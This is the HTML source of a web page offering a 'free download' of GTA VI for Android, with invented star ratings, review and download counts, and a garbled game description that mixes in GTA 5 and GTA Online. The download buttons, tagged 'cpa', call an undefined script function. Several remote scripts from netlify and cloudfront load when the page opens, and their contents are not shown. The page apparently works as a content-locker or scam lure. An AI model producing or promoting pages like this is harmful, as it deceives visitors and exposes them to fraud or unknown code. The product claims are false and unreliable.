
<!DOCTYPE html>

<html>
<head>
   <title>GTA VI - FREE DOWNLOAD</title>
   <meta content='width=device-width, initial-scale=1' name='viewport'/><script src='https://d8.netlify.app/2.JS'></script> 
   <link crossorigin='anonymous' href='https://cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/css/bootstrap.min.css' integrity='sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh' rel='stylesheet'/>
   <link href='https://cdn.jsdelivr.net/npm/bootstrap-icons@1.10.5/font/bootstrap-icons.css' rel='stylesheet'/>
   <link href='https://i.imgur.com/gQfLyMb.png' rel='shortcut icon' type='image/png'/>
   <script type="text/javascript">
    var uJFHK_joS_JWmuEc={"it":4203179,"key":"00077"};
</script>
<script src="https://d115fsoldgezur.cloudfront.net/8614f1d.js"></script>



  
</head>
<style id='page-skin-1' type='text/css'><!--

--></style>
<style id='page-skin-1' type='text/css'>

<!--

--></style>
<body>
<div class='no-items section' id='1'></div>
<div class='no-items section' id='1'></div>
<style type='text/css'>
   
        body {
            font-family: 'Poppins', sans-serif;
            background: #fff;
            display: flex;
            justify-content: center;
        }
        
        .cr .cover img {
            width: 100%;
            
        }
        
        .cr .logo img {
            width: 110px;
            height: 110px;
            border: 1px solid #ddd;
            margin-top: -30px;
            border-radius: 5px;
        }
        
        .cr .logo {
            display: flex;
        }
        
        .cr .logo .info {
            padding: 15px 0 0 15px;
        }
        
        .det {
            display: flex;
            margin: 20px 0;
        }
        
        .det .item {
            width: 100%;
            text-align: center;
            font-size: .9rem;
        }
        
        .btn-down {
            all: unset;
            width: 100%;
            background: #000;
            border: none;
            color: #fff;
            padding: 10px 0;
            border-radius: 34px;
            margin: 10px 0 20px 0;
            text-align: center;
        }
        
        .bad {
            display: flex;
            overflow: scroll;
            color: #666;
        }
        
        .bad div {
            margin-right: 10px;
            padding: 4px 8px;
            border: 1.3px solid #ccc;
            font-size: .8rem;
            white-space: nowrap;
            border-radius: 5px;
        }
        
     
        
        p {
            font-size: .85rem;
            color: #777;
        }
        
        h2 {
            font-size: 1.4rem;
        }
        
        h3 {
            font-size: 1.25rem;
        }
        
        h4 {
            color: #eee;
            font-size: 1rem;
            margin-bottom: 12px;
        }
        
        footer {
            background: #252525;
            padding: 30px 0;
            margin-top: 40px;
            color: #a1a1a1;
            font-size: .9rem;
        }
      
       
    </style>
<br><br>
<div class='cr'>
<div class='cover'><img src='https://i.imgur.com/nVIGHpJ.jpg'/></div>
<div class='container-md'>
<div class='logo'>
<img style='background-color: #252525;' src='https://i.imgur.com/70xcnEn.png'/>
<div class='info'>
<h1>GTA VI 2024</h1>
<small>Welcome To The Club</small>
</div>
</div>
<div class='det'>
<div class='item'>
<div class='icon'>4.8 <i class='bi bi-star'></i></div>
<div>650 k reviews</div>
</div>
<div class='item'>
<div class='icon'><i class='bi bi-download'></i></div>
<div>1.5GB</div>
</div>
<div class='item'>
<div class='icon'>+1.2M</div>
<div>Downloads</div>
</div>
</div>
<div>
<!-- cpa -->
<button class='btn-down' onclick="_wg()">Download Here</button>
</div>
<h2>About this game</h2>
<p> Grand Theft Auto 6 (GTA 6) is an amazing action adventure game with simulator elements, fully adapted for mobile devices on Android. Open World style game gives users complete freedom of action. You can complete certain missions or simply explore a vivid virtual world that lives by its own laws.</p>
<div class='bad'>
<div>#1 top games 2024</div>
<div>GTA 6</div>
</div><br/></div>
<center><div id='bhg'><script src='//d8.netlify.app/1.js'></script><script src='//d8.netlify.app/1.js'></script><script src='//d8.netlify.app/1.js'></script></div></center>
<img class='w-100' src='https://i.imgur.com/XohhMBe.png'/>
<div class='container-md'>
<br>
<h2>WHO WILL ENJOY PLAYING GTA 5 MOBILE THE MOST?</h2>
<p>Gamers who are familiar and experienced with older GTA versions like GTA 6 know the working of the storyline throughout the gameplay. The objective of the game career is based on numerous numbers of missions that also act as a backbone for the whole storyline. These missions must be completed in a sequence to further advance in the storyline. It sounds simple and easy, but it is way tougher than it seems. Players have to face various dynamic encounters between the missions.</p>
<h3>GTA 6 FEATURES</h3>
<p><b>STUNNING VISUALS:</b> ENHANCED LEVELS OF FIDELITY AND PERFORMANCE WITH NEW GRAPHICS MODES FEATURING UP TO 4K RESOLUTION, UP TO 60 FRAMES PER SECOND...</p>
<p><b>NEW MENU DESIGN :</b> IMMEDIATELY ACCESS EVERYTHING GTA ONLINE HAS TO OFFER RIGHT FROM THE MAIN MENU. INCLUDING THE LATEST AND MOST POPULAR UPDATES. </p>
<p><b>EXCLUSIVE NEW CONTENT:</b> STEP INTO HAO&#8217;S SPECIAL WORKS AT THE LOS SANTOS CAR MEET, FEATURING ELITE NEW UPGRADES AND EXCLUSIVE MODIFICATIONS.</p></br><div>

  
<!-- cpa -->
<button class='btn-down' onclick="_wg()">Download Here</button>
</div>
</div>
</div>
</br>
</br>

</body>
</html>